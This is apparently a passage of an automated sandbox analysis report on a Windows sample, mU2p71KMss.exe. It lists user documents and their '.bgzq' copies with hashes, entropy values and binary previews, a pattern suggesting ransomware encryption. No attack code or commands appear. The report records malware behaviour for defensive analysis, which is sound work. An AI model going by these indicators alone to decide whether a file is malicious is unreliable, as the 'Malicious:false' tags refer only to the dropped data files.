                                                                                                SSDEEP:24:FXj4Aq1AqwrsF91WCv6XmnvsSQPcomOfR4OHv5gN3RbJczS2YZHSKtXfzIbD:FUACtwt2sUrOfDB+BNc+T1S+fzSD
                                                                                                MD5:F551407B42A6C4D3E448CA1FEA0B31F2
                                                                                                SHA1:37BC720241E991C0ADE1E1428380B0CC051F2DE8
                                                                                                SHA-256:6546149C81E8176175A8114FAF8B230FFA87D1B9EFED3EC6399C1A427AB3BF1C
                                                                                                SHA-512:0009372BFC460ABC84AEEAB8900A95FD13AE4DAA7A92CE9417E614AA5841EE03D83AB755EF54315F44E8D7E5C3A241FE450A95E62B1B0B9858C8DDCA847A33D1
                                                                                                Malicious:false
                                                                                                Preview:NVWZA.X.....'.Y%...!.p.I...5....d..'.#..8.<...'..Y..%0?..5g..<q.w&..L..aS....q.2.. .%H.............Q8...*H.,..^2H..R.lA%.7v.>XA.........YZ...)......T..A<,..W.k..H...P.qz..A.....^....qe.9..."*...u.dQ...'...9....H.Jp..Q[.....5c>.g0^\K..=.F..r...a..e'y..%O.3;..2..9...I..(C&.}..9>.?."......~.i.1U....'....0..0..y...Z..n.."...S.Z?.>Rxd.vY].G.......n>..7t*....k...s.b...v..8.0. +w.{e....?n[y..........E....&..q.p..@"t..M..d.9.Mx.... .......8.bb.h..d.....;.%.q/8...b...l.....y.go....M..`._f....Y.Zx..=..P..........L%....IH....'a..#..J.:{\.x.~.'S>..t.V.X...K.S./.......T..... .=.{..k.&\mR...n7b..n..d.Su.(.....B={P....v.5x|B...zU......Q.3&.l...D..]...J...wWS.......H"..h#e.x..r....:....B....`..0...s/..#.px6.'j.##".6[z&...k%/<.M..1.]..H%.L!..$......}....Q.>.OK...p........r<x.1K=..t.....;...w...".o..+.\WF..Qw.N..g.}..A..$vP"n......>f...'.P..u.QS.mf.D\...a.f...@.....$..b;A.........$w...4.)..o.Ai......X.~...d.....}&....X.$......C.e....R...H.H.}...K.>..q.B8...o

                                                                                                C:\Users\user\Documents\NVWZAPQSQL\EIVQSAOTAQ.pdf

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.850515227685969
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:REOlHLWYSY1tgW/9gx0Gk5t6PLpZkEwvs/7xvE29I1Vp6f4+Sg8w3bsbXfzIbD:aE6YZgagx0GetYnkEr1EP1l+So3bSfz6
                                                                                                MD5:C6BB3C84255FA89BD030E2857433EF2F
                                                                                                SHA1:30BCD984E9781AD480301D73C9BD107E1CC8D933
                                                                                                SHA-256:1E33BA6A07A2902B23B30113714F73E91C0399B42B14BC1A975ADC194463B60E
                                                                                                SHA-512:3C683FCE152C3E9F813FA6A2FF0FEF478F30ABB89E1AA64B7DA993CF290F7B8CD47270E3BC9A5CD14BCCB572D110A2CF6929046D1C0C2CE96F19E4681B2E2139
                                                                                                Malicious:false
                                                                                                Preview:EIVQSL~....(..Q.l.......Ea.E...X..IcI/(.....b...L.{..g...>......tO....]..6.,.,$..M..y..P....`...C..v..f...B].*..Yk.D....@..#..k...$.....\.g..a.].;.4K|(.?...0.@....gKm.G.....K.{%.s.g...n..Vr........_d.^.9...g..^2.;._..8.}...#.%U.RVK..F..p.....^.D9.`....#.e. ...9..4b..T.....U.D.,<.qj..{c.W..).........,H|JS..../".s.....;..(B........$..3./.F..N...,.&&.PR.....'$D:U....}k..%s,D1<..l.Y&u..-..)...!l.$.f....$.}?bP.......d..7.,,6.P.......5..*..O.".&..n...&*;Y..FPD...Y.r..5S..9Lw5a./...D.~.Qqj.W....... ....;.....Bx.v..G.W.h};..i......J....gg.....>......Qv....6"..L*..$..:2Oh....a-.!..0....p.y].G.B....f.j.......CY..2oB.SB.O.q.n....f.....v..J:..t8....Zy../...*+...........a...W.l&<8.)9B..OC..o.=.....R.O.......D....4g.%;..M.... ... .l6.e$K..F.d....(..q..W.&:...|..@l... ..j.I... ..G.E.-...I6]U6.|.@i"..%oW.=...a.)Y.7....7.t..I.4... O.....E.7FEj.......ZY.Nh?.:|<.w.u.u..=....R...A..&..=.....'<PC.['....q.v.KY..z...eo.eIu.=...d.owh..&.t....&.e...%.d..

                                                                                                C:\Users\user\Documents\NVWZAPQSQL\EIVQSAOTAQ.pdf.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.850515227685969
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:REOlHLWYSY1tgW/9gx0Gk5t6PLpZkEwvs/7xvE29I1Vp6f4+Sg8w3bsbXfzIbD:aE6YZgagx0GetYnkEr1EP1l+So3bSfz6
                                                                                                MD5:C6BB3C84255FA89BD030E2857433EF2F
                                                                                                SHA1:30BCD984E9781AD480301D73C9BD107E1CC8D933
                                                                                                SHA-256:1E33BA6A07A2902B23B30113714F73E91C0399B42B14BC1A975ADC194463B60E
                                                                                                SHA-512:3C683FCE152C3E9F813FA6A2FF0FEF478F30ABB89E1AA64B7DA993CF290F7B8CD47270E3BC9A5CD14BCCB572D110A2CF6929046D1C0C2CE96F19E4681B2E2139
                                                                                                Malicious:false
                                                                                                Preview:EIVQSL~....(..Q.l.......Ea.E...X..IcI/(.....b...L.{..g...>......tO....]..6.,.,$..M..y..P....`...C..v..f...B].*..Yk.D....@..#..k...$.....\.g..a.].;.4K|(.?...0.@....gKm.G.....K.{%.s.g...n..Vr........_d.^.9...g..^2.;._..8.}...#.%U.RVK..F..p.....^.D9.`....#.e. ...9..4b..T.....U.D.,<.qj..{c.W..).........,H|JS..../".s.....;..(B........$..3./.F..N...,.&&.PR.....'$D:U....}k..%s,D1<..l.Y&u..-..)...!l.$.f....$.}?bP.......d..7.,,6.P.......5..*..O.".&..n...&*;Y..FPD...Y.r..5S..9Lw5a./...D.~.Qqj.W....... ....;.....Bx.v..G.W.h};..i......J....gg.....>......Qv....6"..L*..$..:2Oh....a-.!..0....p.y].G.B....f.j.......CY..2oB.SB.O.q.n....f.....v..J:..t8....Zy../...*+...........a...W.l&<8.)9B..OC..o.=.....R.O.......D....4g.%;..M.... ... .l6.e$K..F.d....(..q..W.&:...|..@l... ..j.I... ..G.E.-...I6]U6.|.@i"..%oW.=...a.)Y.7....7.t..I.4... O.....E.7FEj.......ZY.Nh?.:|<.w.u.u..=....R...A..&..=.....'<PC.['....q.v.KY..z...eo.eIu.=...d.owh..&.t....&.e...%.d..

                                                                                                C:\Users\user\Documents\NVWZAPQSQL\NVWZAPQSQL.docx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.83192904419817
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FJCcNxdUV400XZtX2MoWkwvnyrOFDc+sYW/18nFqFcL8HLwrudu9+7RQU+3jh5eC:FJJxGlGrgWtvnyrszWGkFXHLw6dptC3D
                                                                                                MD5:1D7139E3E605E70CF5D221D4B5E11D18
                                                                                                SHA1:E953A76B7937562FDFC13CC33410EB0F77DE7E56
                                                                                                SHA-256:4A974C5519B9C88BBA7C100A27C93DF4F0692614D7587497A63CEDE485F13F1D
                                                                                                SHA-512:1439C27E46B4445830A5487FDCCF65D6D7194D1950F76823A25EA904225FCAAAF110ACDE9792F872194159ED85AB168933C427602241A7E05541E258EC63AF65
                                                                                                Malicious:false
                                                                                                Preview:NVWZAE...20.Kr...g.^..q.66B./.g..1{..1..P.0.Wp..X..oD...G...<..k..R.1B.+......#...a.EU.,.N>.y........Z.r........:..S.=w...V..*....6{<.t.Y[..F_D..F}3..P..l...........Y.Y..!(f..f.,.[u.,.,O Km|.I....F@....e.#rY..............W...C..].Q.........R.&u#.Ew .|%0.%..'....9.m..M.'..r.....9h:.D...+Cl.k........M...X8..C.h_.L...R..h/.q<...3. .r.<o}R.?hrG.LJ........`>.N......i.W..N.R..|.....D.1.....R.:.Q...KR.=.....S.2.e..:8...;.8i...]..4H..6..)..v|.3I...M..v%.e.k....FIUc........I.:.....z.W..>..........u.r.S.U.J.e.q.S#v.......r\.....Y.4.KR.b.kI..].%y....)(.P`.....T...:/.....*.-/v..<..}........3V.0.w.c...7xCk.\.O.f.xy....r.O..v6C..s7..w.K.... o@F...-...m.......w..A...i?....W.x ...!.....-}...2....A.P....fC.........*.i...0..Yx<n.X....p.....|..h.K.p..|.[.....b;...{D..."...@....5........R.X..H.:....K.. ..fNXD.{#yHAP.-.V..}`......cons.d..^e..}......kN.G..'A........EC.kz}.Q2..\..0w...ZE..u..Z[.:8..NU...B.X...Pe.!#..Q.".D.........X.[...W..P....@.v../..f&...*.U..I<..

                                                                                                C:\Users\user\Documents\NVWZAPQSQL\NVWZAPQSQL.docx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.83192904419817
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FJCcNxdUV400XZtX2MoWkwvnyrOFDc+sYW/18nFqFcL8HLwrudu9+7RQU+3jh5eC:FJJxGlGrgWtvnyrszWGkFXHLw6dptC3D
                                                                                                MD5:1D7139E3E605E70CF5D221D4B5E11D18
                                                                                                SHA1:E953A76B7937562FDFC13CC33410EB0F77DE7E56
                                                                                                SHA-256:4A974C5519B9C88BBA7C100A27C93DF4F0692614D7587497A63CEDE485F13F1D
                                                                                                SHA-512:1439C27E46B4445830A5487FDCCF65D6D7194D1950F76823A25EA904225FCAAAF110ACDE9792F872194159ED85AB168933C427602241A7E05541E258EC63AF65
                                                                                                Malicious:false
                                                                                                Preview:NVWZAE...20.Kr...g.^..q.66B./.g..1{..1..P.0.Wp..X..oD...G...<..k..R.1B.+......#...a.EU.,.N>.y........Z.r........:..S.=w...V..*....6{<.t.Y[..F_D..F}3..P..l...........Y.Y..!(f..f.,.[u.,.,O Km|.I....F@....e.#rY..............W...C..].Q.........R.&u#.Ew .|%0.%..'....9.m..M.'..r.....9h:.D...+Cl.k........M...X8..C.h_.L...R..h/.q<...3. .r.<o}R.?hrG.LJ........`>.N......i.W..N.R..|.....D.1.....R.:.Q...KR.=.....S.2.e..:8...;.8i...]..4H..6..)..v|.3I...M..v%.e.k....FIUc........I.:.....z.W..>..........u.r.S.U.J.e.q.S#v.......r\.....Y.4.KR.b.kI..].%y....)(.P`.....T...:/.....*.-/v..<..}........3V.0.w.c...7xCk.\.O.f.xy....r.O..v6C..s7..w.K.... o@F...-...m.......w..A...i?....W.x ...!.....-}...2....A.P....fC.........*.i...0..Yx<n.X....p.....|..h.K.p..|.[.....b;...{D..."...@....5........R.X..H.:....K.. ..fNXD.{#yHAP.-.V..}`......cons.d..^e..}......kN.G..'A........EC.kz}.Q2..\..0w...ZE..u..Z[.:8..NU...B.X...Pe.!#..Q.".D.........X.[...W..P....@.v../..f&...*.U..I<..

                                                                                                C:\Users\user\Documents\NVWZAPQSQL\PALRGUCVEH.xlsx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.847834839336134
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:wOWWB8q3BQ/82kMSopoNdDydzSAKE8fZMof781QPyaATymXXfzIbD:w67BbHMSokDydz/KNfq2M7TymHfzSD
                                                                                                MD5:BCB62743B01C54336DC64322BF8031F5
                                                                                                SHA1:B95A9A6192B6C366C374E477582354965F614587
                                                                                                SHA-256:993031B3F85668EB68D62C8E981B6B2AD4CD7D981482D0AE0732BCA90E870B0D
                                                                                                SHA-512:8386B87E7D5B1B627AD84626CEAC6F4D451731970FB141714BDAEF0A87017A5D4D2A8F1F644D57A6776501E8C285B7328D1DAEB6B164403A467A8CFF1CA2EA20
                                                                                                Malicious:false
                                                                                                Preview:PALRGo{..B:...B_/.p.nWt..fQGd.X$+.w.B.. U,.q.6.\.Z.9.G............g.;....................#U.Y..E.y...c.;...Ds.~.M.."Z...e..z.<..S6&..U.`.v...$Q......b....h.$S6M....Ln.X.8.*l.L..IW....J(..!6..Z#..............w=.U$.....C$....F...!(..W......P..Qh....ZN,8..T....w.#.?^..w%..u......%w>....R19f,.Vp....Vcr;.....K.]._.1Xe5...1.f...G.fZ.cA._9y.;..........%9...|d.7..........5.....X<HW<..%_...<..4..X5.....l[....p.RB......#.|.9.].bJt...".B.e.gWT...._.U...<.m....k..I'.jF....^y...8..U..!j.O7./.o.&....W.L_..o4.H.%.ns.jZ.....A.f....Oz....L.m$b...]=.l].....;.../...i".....DI....V...\.~{*.....O3,ms......6.P.'A<N.l.!.S.,.e.....5...H....2.....a.h..LO3.......*.Fx.R)i..t..^..s... ..3.>..qU........y{..z...h......<.U.S.....=...E\...Ap.....#.?%.V5....G.!.Yo..4.{v..C.. K.@.d......S.G|....nsg|..}...G.S-..0.S.*K..Yq.b.....L>3l.....,7f......l..,.K.zU...v..h..j..8...;._..v,.:..QL}K..n?...|.R.B.s.8..@..N.-V>f.7.P..L./..1`.C....u...fw:.....D......{.^*B.....wv1..(j...

                                                                                                C:\Users\user\Documents\NVWZAPQSQL\PALRGUCVEH.xlsx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.847834839336134
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:wOWWB8q3BQ/82kMSopoNdDydzSAKE8fZMof781QPyaATymXXfzIbD:w67BbHMSokDydz/KNfq2M7TymHfzSD
                                                                                                MD5:BCB62743B01C54336DC64322BF8031F5
                                                                                                SHA1:B95A9A6192B6C366C374E477582354965F614587
                                                                                                SHA-256:993031B3F85668EB68D62C8E981B6B2AD4CD7D981482D0AE0732BCA90E870B0D
                                                                                                SHA-512:8386B87E7D5B1B627AD84626CEAC6F4D451731970FB141714BDAEF0A87017A5D4D2A8F1F644D57A6776501E8C285B7328D1DAEB6B164403A467A8CFF1CA2EA20
                                                                                                Malicious:false
                                                                                                Preview:PALRGo{..B:...B_/.p.nWt..fQGd.X$+.w.B.. U,.q.6.\.Z.9.G............g.;....................#U.Y..E.y...c.;...Ds.~.M.."Z...e..z.<..S6&..U.`.v...$Q......b....h.$S6M....Ln.X.8.*l.L..IW....J(..!6..Z#..............w=.U$.....C$....F...!(..W......P..Qh....ZN,8..T....w.#.?^..w%..u......%w>....R19f,.Vp....Vcr;.....K.]._.1Xe5...1.f...G.fZ.cA._9y.;..........%9...|d.7..........5.....X<HW<..%_...<..4..X5.....l[....p.RB......#.|.9.].bJt...".B.e.gWT...._.U...<.m....k..I'.jF....^y...8..U..!j.O7./.o.&....W.L_..o4.H.%.ns.jZ.....A.f....Oz....L.m$b...]=.l].....;.../...i".....DI....V...\.~{*.....O3,ms......6.P.'A<N.l.!.S.,.e.....5...H....2.....a.h..LO3.......*.Fx.R)i..t..^..s... ..3.>..qU........y{..z...h......<.U.S.....=...E\...Ap.....#.?%.V5....G.!.Yo..4.{v..C.. K.@.d......S.G|....nsg|..}...G.S-..0.S.*K..Yq.b.....L>3l.....,7f......l..,.K.zU...v..h..j..8...;._..v,.:..QL}K..n?...|.R.B.s.8..@..N.-V>f.7.P..L./..1`.C....u...fw:.....D......{.^*B.....wv1..(j...

                                                                                                C:\Users\user\Documents\NVWZAPQSQL\TQDFJHPUIU.jpg

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.852054552945122
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:dQrKjf10Va5NK41cN5TRCj2p3GibyWUI7UjwruSuD5YAO+V8E7yvGlSG1XfzIbD:dQyfN5NeXNCY1b9UjwruSuD+WyulSWf2
                                                                                                MD5:FD4D9CE9D2A35AC0E36062ABD776A346
                                                                                                SHA1:9CD631AE0A0952E92BB24BE4AA1AF0D27F5ED329
                                                                                                SHA-256:A309D70B2FA564EE531E2EC2F56899425940D4CAE8827793D3E215CBFC97ECD5
                                                                                                SHA-512:930DB9DBB462BDB5F9B3B62DD1CA8C05008A20E95BFD90C9A54C84661B5F74449C56A1CA4BA31539614A7DEEC54E71C97DF2D0002EADC398165E7752148BE7D0
                                                                                                Malicious:false
                                                                                                Preview:TQDFJ- ...}.....".4..6Y#.9....`...B.Q........i..h..my....P.<.I.....J...Ak..S....../...7....&...4-.5..'1'o.>..?]..v...js?eIb.*m.>o.':.&.I\n..y....x.....J.I8z....){E.U1.AWtW...yUn".8.........Vn=I.q.!.._.....c..t.Q.}..c....|...m..@...v..3FX`<T..GyOZX...........O'.l.#..{...{.dh..v.].o^.%5;+.`... .4..$.w.7R_|FSS.9_Z..\.:s.\.YR.C?..IR+.f.F.Gw.C..;.o....C.6DP.y.......F....9G.%;5r.0nj....j3X...6.......O_....l./.....(...@*.h ..4.o!..E..G...ZgB.<..........1....2.?A.......}...xQ..S..S*W.m........h....4..8..Y..".E*~..F.d.....^8.?..?9T4......hD).....n.f.W..B|.....F#.hR\....c.6q.r!S.T..L.....O......c..c,.......t.c;x..^Q...V..WN..]<..AHy.P.?...6af....g@!..h.V..,F./S].V..[G.">t}..>....=....?.9....?i?vS....N...!.}..S.aV@f.o..3.BB1Q.Y.....N.X...p.W.{.U..j..=.1.a.r.....[.......k.1...:v:#&a..J.....XT.`;.x.....<l.B8_.....}...+s...<.J.q...h9.r..A.o..~a..E......s.0UE...~p........b.B.^....AV2N....x..8\.&.e.&...%"...J..wU..xk.QJ......V.F.?r^.m.:.[3...v..(.2!$Q.

                                                                                                C:\Users\user\Documents\NVWZAPQSQL\TQDFJHPUIU.jpg.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.852054552945122
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:dQrKjf10Va5NK41cN5TRCj2p3GibyWUI7UjwruSuD5YAO+V8E7yvGlSG1XfzIbD:dQyfN5NeXNCY1b9UjwruSuD+WyulSWf2
                                                                                                MD5:FD4D9CE9D2A35AC0E36062ABD776A346
                                                                                                SHA1:9CD631AE0A0952E92BB24BE4AA1AF0D27F5ED329
                                                                                                SHA-256:A309D70B2FA564EE531E2EC2F56899425940D4CAE8827793D3E215CBFC97ECD5
                                                                                                SHA-512:930DB9DBB462BDB5F9B3B62DD1CA8C05008A20E95BFD90C9A54C84661B5F74449C56A1CA4BA31539614A7DEEC54E71C97DF2D0002EADC398165E7752148BE7D0
                                                                                                Malicious:false
                                                                                                Preview:TQDFJ- ...}.....".4..6Y#.9....`...B.Q........i..h..my....P.<.I.....J...Ak..S....../...7....&...4-.5..'1'o.>..?]..v...js?eIb.*m.>o.':.&.I\n..y....x.....J.I8z....){E.U1.AWtW...yUn".8.........Vn=I.q.!.._.....c..t.Q.}..c....|...m..@...v..3FX`<T..GyOZX...........O'.l.#..{...{.dh..v.].o^.%5;+.`... .4..$.w.7R_|FSS.9_Z..\.:s.\.YR.C?..IR+.f.F.Gw.C..;.o....C.6DP.y.......F....9G.%;5r.0nj....j3X...6.......O_....l./.....(...@*.h ..4.o!..E..G...ZgB.<..........1....2.?A.......}...xQ..S..S*W.m........h....4..8..Y..".E*~..F.d.....^8.?..?9T4......hD).....n.f.W..B|.....F#.hR\....c.6q.r!S.T..L.....O......c..c,.......t.c;x..^Q...V..WN..]<..AHy.P.?...6af....g@!..h.V..,F./S].V..[G.">t}..>....=....?.9....?i?vS....N...!.}..S.aV@f.o..3.BB1Q.Y.....N.X...p.W.{.U..j..=.1.a.r.....[.......k.1...:v:#&a..J.....XT.`;.x.....<l.B8_.....}...+s...<.J.q...h9.r..A.o..~a..E......s.0UE...~p........b.B.^....AV2N....x..8\.&.e.&...%"...J..wU..xk.QJ......V.F.?r^.m.:.[3...v..(.2!$Q.

                                                                                                C:\Users\user\Documents\NVWZAPQSQL\UNKRLCVOHV.mp3

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.843439734254509
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:XBGWbJ1gak37+Ceos+j8APEqPk1a4V2mhfsHMYgC06Oec9JUB3ilMxAbPdRWBXf2:Rn9qakLqos/ifk1npssYMeYq3iK0gfz6
                                                                                                MD5:13DC9B20B0F1499F26C5972F8E826CCE
                                                                                                SHA1:03E32F09F9AB444F2CF1534EE197B5CA8191A20F
                                                                                                SHA-256:93ABD16FFB245DF23A50B8608F3F932077E58579A2837C4749E9B92076EEE179
                                                                                                SHA-512:DB93198F8E8525BF7048C7B19E40CE8E59415BC6ECD91DB14F9F0BE380492848D02761210B81EE988808BBF3E9D7906D7E5E8FD90D8876C5A0D7B12AA2EE4836
                                                                                                Malicious:false
                                                                                                Preview:UNKRL%GGT.J..i..]Y."......M....k0........w.<.^....l..n.Z.8......?.T... ..a.+..y$zG....<@......=.i.tr`...F.LC. .......@.~#7._A.4...bE.su..fg....]V.....p.b.bL.U.%....yh.My).-!> ..E..[......K]..6.>{...r..g=j!E...........Y..yXk_..t..T.uj.yg3./.7.~....[..n.{....xJX2TA..id.>P...L0;B...L.....JY.N..77.LO.'1)H..........lSm....e=j..... ...<I...2....8?.. .T.\....Q!.^..X[.%vj......t..mQ.Y.?..NW.........IS.Z.,\...U!.1j!H....YB...o.I....!....$ku#./.D.\...z7....Y...\P....FC;..=.:d.L........q..n.6......6....#m7.....R.....n4..31.J....-..T...S.3.s..$.[.>.Ct...v!...............A s_Z....2I3.......B..l.N..E........*..m..........`~7..Y..:m...j.ni`....PA..[.+..y.....h.[..w..ab`.H.-...;Rs)..XT.."KT.......Lm.i.....5....-K.#.}..b.R.0..%.....<.9.....2.j.p\#C$0....v[...8C...;...Dr.1.l.D......A=nO..Ve`&....H.......,.....?.&F...z.%.v\q.V,a.....8.6.......TW....P......!....=.....C...LL....Pc...&T k....G....o...Jo^_.X.C..y...#.3.@.R.b.q.z.".....r....r..3e.2....B..0?s'j

                                                                                                C:\Users\user\Documents\NVWZAPQSQL\UNKRLCVOHV.mp3.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.843439734254509
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:XBGWbJ1gak37+Ceos+j8APEqPk1a4V2mhfsHMYgC06Oec9JUB3ilMxAbPdRWBXf2:Rn9qakLqos/ifk1npssYMeYq3iK0gfz6
                                                                                                MD5:13DC9B20B0F1499F26C5972F8E826CCE
                                                                                                SHA1:03E32F09F9AB444F2CF1534EE197B5CA8191A20F
                                                                                                SHA-256:93ABD16FFB245DF23A50B8608F3F932077E58579A2837C4749E9B92076EEE179
                                                                                                SHA-512:DB93198F8E8525BF7048C7B19E40CE8E59415BC6ECD91DB14F9F0BE380492848D02761210B81EE988808BBF3E9D7906D7E5E8FD90D8876C5A0D7B12AA2EE4836
                                                                                                Malicious:false
                                                                                                Preview:UNKRL%GGT.J..i..]Y."......M....k0........w.<.^....l..n.Z.8......?.T... ..a.+..y$zG....<@......=.i.tr`...F.LC. .......@.~#7._A.4...bE.su..fg....]V.....p.b.bL.U.%....yh.My).-!> ..E..[......K]..6.>{...r..g=j!E...........Y..yXk_..t..T.uj.yg3./.7.~....[..n.{....xJX2TA..id.>P...L0;B...L.....JY.N..77.LO.'1)H..........lSm....e=j..... ...<I...2....8?.. .T.\....Q!.^..X[.%vj......t..mQ.Y.?..NW.........IS.Z.,\...U!.1j!H....YB...o.I....!....$ku#./.D.\...z7....Y...\P....FC;..=.:d.L........q..n.6......6....#m7.....R.....n4..31.J....-..T...S.3.s..$.[.>.Ct...v!...............A s_Z....2I3.......B..l.N..E........*..m..........`~7..Y..:m...j.ni`....PA..[.+..y.....h.[..w..ab`.H.-...;Rs)..XT.."KT.......Lm.i.....5....-K.#.}..b.R.0..%.....<.9.....2.j.p\#C$0....v[...8C...;...Dr.1.l.D......A=nO..Ve`&....H.......,.....?.&F...z.%.v\q.V,a.....8.6.......TW....P......!....=.....C...LL....Pc...&T k....G....o...Jo^_.X.C..y...#.3.@.R.b.q.z.".....r....r..3e.2....B..0?s'j

                                                                                                C:\Users\user\Documents\NVWZAPQSQL\ZIPXYXWIOY.png

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.838279430182836
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:JTO/ZNrpb66DB93PSn3Hs0el++VeqxozEneP13gbQIm3/zO9S3syRErDSXfzIbD:JCNrpGmB93PSnFgjVemozEewO3LO9S3A
                                                                                                MD5:563F1D117310159ECE22E2B1F874293A
                                                                                                SHA1:0B8AB7FDBD688D6F69D89B6D79E77554E3EEC877
                                                                                                SHA-256:A3CD9EACC09EB6AAD80F8D69C4B752583F6EADD73C6050B4A870DC3DD6B69775
                                                                                                SHA-512:9E5310010085558B36FBA1ED857D58B7548F2A6C2AA722BD6352506874BEB0BBD64C2F177E69D2DF823B6835497B51A99B3F42CD43673932779E0552871621FD
                                                                                                Malicious:false
                                                                                                Preview:ZIPXY.....<.].(..cK..u.9..l. y..~..*...c.Gv(.|.....!t...Z...%.8.&...ow.iM.........<&.%..P..E.ai<..g[)U.V.:>.P..?u........>.K......N............p.i/.S....v^7S..1..>.n......-.q..7H.*f....d.(^.m........7C{.k.*<........I .......e?ON.J.k...t.H........N.84..>.kr;B.......]..[..3.T. 7j......V?.J.. .I..*L.;..Uz....B.aF[...>0xr+.qP=G.rj....>.Pgq.2N.....Dz.G..n..r.z~..x#p.]u..6`..*.6.wq.s{%d...h.>.R&V+..C.A,.\.g ..x].pb...T.....'.O.h.hq(Y`..k0:.j>...y..f..<2b..~.9.&A..4...7..ul.i..<..{..}"{.F......7.,..2....v..1.q.o.>h.!..6.+..E.....5...U8.....|...qT.3....d...S....t..U.....GS..=9....f..C.0;C.4......z(v....L..}..FM.Iw.t.q..o...x.u..l..!..1..+...\.v.....$.t;P..7J.|.L.6.3.Gy.N.{@|.......C~Q..s..%...`*...O..Q....N..'.....4..B.0..g...\..u..P..7..y_D..b.....jf}...4......2..{..j.?....s,.....&...t.#]J.3.MIC.~>^.k....47.......!..p../KXA......No.a...?...N4.y.7..jy....N.p...X..o8b....H....fA_....}.Z..NX.O..$.;..;.T.n..T.,!d..En.m...>Cx.OO..0......Y..I..w.|.....

                                                                                                C:\Users\user\Documents\NVWZAPQSQL\ZIPXYXWIOY.png.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.838279430182836
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:JTO/ZNrpb66DB93PSn3Hs0el++VeqxozEneP13gbQIm3/zO9S3syRErDSXfzIbD:JCNrpGmB93PSnFgjVemozEewO3LO9S3A
                                                                                                MD5:563F1D117310159ECE22E2B1F874293A
                                                                                                SHA1:0B8AB7FDBD688D6F69D89B6D79E77554E3EEC877
                                                                                                SHA-256:A3CD9EACC09EB6AAD80F8D69C4B752583F6EADD73C6050B4A870DC3DD6B69775
                                                                                                SHA-512:9E5310010085558B36FBA1ED857D58B7548F2A6C2AA722BD6352506874BEB0BBD64C2F177E69D2DF823B6835497B51A99B3F42CD43673932779E0552871621FD
                                                                                                Malicious:false
